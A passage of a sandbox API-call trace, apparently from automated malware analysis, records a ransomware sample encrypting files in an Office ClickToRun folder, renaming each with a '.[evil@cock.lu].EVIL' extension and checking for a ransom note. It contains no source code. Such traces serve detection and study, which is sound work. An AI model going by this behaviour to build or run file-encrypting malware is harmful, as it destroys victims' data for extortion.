WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x60e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x60e0, lpOverlapped=0x0) returned 1 [0081.502] CloseHandle (hObject=0x1a4) returned 1 [0081.503] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.504] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.504] __uncaught_exception () returned 0x84b1160800 [0081.504] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.507] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-stdio-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.508] ??_V@YAXPEAX@Z () returned 0x1 [0081.511] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-stdio-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.511] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.511] wcsstr (_Str="api-ms-win-crt-string-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.511] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 91 [0081.511] wcscmp (_String1="api-ms-win-crt-string-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.511] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-string-l1-1-0.dll") returned 0x0 [0081.511] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 0x5b [0081.512] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.514] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x60c0, lpOverlapped=0x0) returned 1 [0081.538] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.538] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.538] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.538] _errno () returned 0x84b1160840 [0081.538] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.538] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x60e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x60e0, lpOverlapped=0x0) returned 1 [0081.538] CloseHandle (hObject=0x1a4) returned 1 [0081.572] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.573] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.573] __uncaught_exception () returned 0x84b1160800 [0081.573] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.574] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.574] ??_V@YAXPEAX@Z () returned 0x1 [0081.578] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.578] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.578] wcsstr (_Str="api-ms-win-crt-time-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.578] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 89 [0081.578] wcscmp (_String1="api-ms-win-crt-time-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.578] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-time-l1-1-0.dll") returned 0x0 [0081.578] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 0x59 [0081.578] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.580] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x52c0, lpOverlapped=0x0) returned 1 [0081.685] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.685] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.685] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.685] _errno () returned 0x84b1160840 [0081.685] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.685] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2f040*, nNumberOfBytesToWrite=0x52e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x52e0, lpOverlapped=0x0) returned 1 [0081.686] CloseHandle (hObject=0x1a4) returned 1 [0081.686] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.687] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.687] __uncaught_exception () returned 0x84b1160800 [0081.687] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.688] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.688] ??_V@YAXPEAX@Z () returned 0x1 [0081.691] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.691] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.691] wcsstr (_Str="api-ms-win-crt-utility-l1-1-0.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.691] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 92 [0081.691] wcscmp (_String1="api-ms-win-crt-utility-l1-1-0.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.691] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="api-ms-win-crt-utility-l1-1-0.dll") returned 0x0 [0081.691] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll") returned 0x5c [0081.691] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.693] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4ac0, lpOverlapped=0x0) returned 1 [0081.727] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.727] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.727] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.727] _errno () returned 0x84b1160840 [0081.727] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.727] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4ae0, lpOverlapped=0x0) returned 1 [0081.727] CloseHandle (hObject=0x1a4) returned 1 [0081.728] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.728] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.728] __uncaught_exception () returned 0x84b1160800 [0081.729] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.729] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-utility-l1-1-0.dll.[evil@cock.lu].evil")) returned 1 [0081.730] ??_V@YAXPEAX@Z () returned 0x1 [0081.733] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-utility-l1-1-0.dll", dwFileAttributes=0x0) returned 0 [0081.734] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.734] wcsstr (_Str="ApiClient.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.734] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 72 [0081.734] wcscmp (_String1="ApiClient.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.734] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ApiClient.dll") returned 0x0 [0081.734] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll") returned 0x48 [0081.734] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0081.734] GetLastError () returned 0x20 [0081.734] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.734] wcsstr (_Str="AppVCatalog.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.734] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 74 [0081.734] wcscmp (_String1="AppVCatalog.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.734] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVCatalog.dll") returned 0x0 [0081.734] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 0x4a [0081.734] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0081.735] GetLastError () returned 0x20 [0081.735] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.735] wcsstr (_Str="appvcleaner.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.735] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 74 [0081.735] wcscmp (_String1="appvcleaner.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.735] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="appvcleaner.exe") returned 0x0 [0081.735] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 0x4a [0081.735] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.738] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0081.822] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0081.822] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.822] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0081.822] _errno () returned 0x84b1160840 [0081.823] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.823] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0081.868] CloseHandle (hObject=0x1a4) returned 1 [0081.896] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0081.897] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0081.897] __uncaught_exception () returned 0x84b1160800 [0081.897] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0081.919] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe.[evil@cock.lu].evil")) returned 1 [0081.919] ??_V@YAXPEAX@Z () returned 0x1 [0081.922] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe", dwFileAttributes=0x0) returned 0 [0081.922] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.922] wcsstr (_Str="AppVFileSystemMetadata.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.922] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 85 [0081.922] wcscmp (_String1="AppVFileSystemMetadata.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.922] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVFileSystemMetadata.dll") returned 0x0 [0081.922] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll") returned 0x55 [0081.922] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVFileSystemMetadata.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvfilesystemmetadata.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0081.923] GetLastError () returned 0x20 [0081.923] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.923] wcsstr (_Str="AppVIntegration.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.923] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 78 [0081.923] wcscmp (_String1="AppVIntegration.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.923] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVIntegration.dll") returned 0x0 [0081.923] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll") returned 0x4e [0081.923] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIntegration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvintegration.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0081.923] GetLastError () returned 0x20 [0081.923] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.923] wcsstr (_Str="AppVIsvApi.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.923] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 73 [0081.923] wcscmp (_String1="AppVIsvApi.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.923] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVIsvApi.dll") returned 0x0 [0081.923] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll") returned 0x49 [0081.923] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvApi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0081.923] GetLastError () returned 0x20 [0081.923] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.923] wcsstr (_Str="AppVIsvStreamingManager.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.923] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 86 [0081.923] wcscmp (_String1="AppVIsvStreamingManager.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.923] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVIsvStreamingManager.dll") returned 0x0 [0081.923] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll") returned 0x56 [0081.923] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvStreamingManager.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstreamingmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0081.924] GetLastError () returned 0x20 [0081.924] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.924] wcsstr (_Str="AppVIsvSubsystemController.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.924] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 89 [0081.924] wcscmp (_String1="AppVIsvSubsystemController.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.924] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppVIsvSubsystemController.dll") returned 0x0 [0081.924] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll") returned 0x59 [0081.924] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvSubsystemController.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystemcontroller.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0081.924] GetLastError () returned 0x20 [0081.924] FindNextFileW (in: hFindFile=0x84b11dd200, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0081.924] wcsstr (_Str="AppvIsvSubsystems32.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0081.925] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 82 [0081.925] wcscmp (_String1="AppvIsvSubsystems32.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0081.925] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="AppvIsvSubsystems32.dll") returned 0x0 [0081.925] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll") returned 0x52 [0081.925] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0081.926] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0082.025] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0082.025] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0082.025] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0082.025] _errno () returned 0x84b1160840 [0082.027] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.027] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0082.050] CloseHandle (hObject=0x1a4) returned 1 [0082.085] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems32.dll", _Mode="a", 